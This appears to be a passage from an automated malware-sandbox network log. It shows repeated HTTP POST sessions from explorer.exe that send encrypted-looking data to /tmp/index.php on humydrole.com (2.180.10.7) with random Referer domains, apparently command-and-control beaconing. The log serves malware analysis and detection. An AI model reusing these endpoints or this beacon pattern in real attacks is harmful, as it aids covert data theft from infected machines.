Dec 22, 2023 21:13:10.715620995 CET	301	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 4e 05 bf f8 Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vuN.jGVYd'0<tm]+83[AO(5I`\!U~(C-Kc=SAgE%N--r#O]HOWO
Dec 22, 2023 21:13:11.660237074 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:11 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49786	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:11.989028931 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mruisvxdryyuqw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 351 Host: humydrole.com
Dec 22, 2023 21:13:11.989064932 CET	351	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 4a 1d ca 86 Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vuJVcEosXQMMnH}uLi[7JML8W-v^5&ibM?O4f$WiS_JLV*nU>F]
Dec 22, 2023 21:13:14.052220106 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:13 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49788	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:14.386954069 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nsslduqqiduo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: humydrole.com
Dec 22, 2023 21:13:14.386981010 CET	318	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 43 5a e2 ed Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vuCZ+`Jwa=(Gj\Ze280nHPYk\|s#!zBQmqKCut.+X<f-D~<>Xa^=
Dec 22, 2023 21:13:15.323421001 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:15 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49791	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:15.650510073 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fvinrdiiffav.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 343 Host: humydrole.com
Dec 22, 2023 21:13:15.650625944 CET	343	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 3e 54 f0 e7 Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vu>T\t @6r<d fi!*=Zn:^xItvf2I5M1COx<GgJ(cm`(%ObZ_l
Dec 22, 2023 21:13:17.773588896 CET	238	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:13:17 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49792	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:18.730201006 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vfgbsotyumyfug.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 186 Host: humydrole.com
Dec 22, 2023 21:13:18.730237961 CET	186	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 4f 47 d3 95 Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vuOGfL]yD2uRmysXqx9F8Wf}!T_soG;<aX/F
Dec 22, 2023 21:13:19.314249992 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:19 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49793	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:19.638305902 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pupocdkvvfl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 256 Host: humydrole.com
Dec 22, 2023 21:13:19.638338089 CET	256	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 60 56 b3 8f Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vu`VmAyzJYDu3oZFgE`AOXR,~E0U_5O%uZ8H%xRJ(q8fCKFejW+^
Dec 22, 2023 21:13:20.610146046 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:20 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49794	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:20.934734106 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vgwyaetyqblf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 191 Host: humydrole.com
Dec 22, 2023 21:13:20.934784889 CET	191	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 45 59 ce a2 Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vuEY(]*wlCzptIZ!txdT;{U(5 etCO7ET%&uv
Dec 22, 2023 21:13:21.532022953 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:21 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49795	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:21.862603903 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oucqjykheatrmbb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 281 Host: humydrole.com
Dec 22, 2023 21:13:21.862633944 CET	281	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 28 05 b0 85 Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vu(fEeYIvq=\5<kIG@WLl% /oJ+E\|L[a5A=qtL"7mExDEW9gC
Dec 22, 2023 21:13:22.835536003 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:22 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49796	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:23.166810036 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wmcucjsolnxsniv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 306 Host: humydrole.com
Dec 22, 2023 21:13:23.167103052 CET	306	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 41 26 b7 e8 Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vuA&k]d~bcDc)?{mR8'mKk9}.]77c;2sx\YP\ vFC,Wgg:Tz
Dec 22, 2023 21:13:24.205563068 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:23 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49797	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:24.531503916 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bqbmikgakbibqjt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 350 Host: humydrole.com
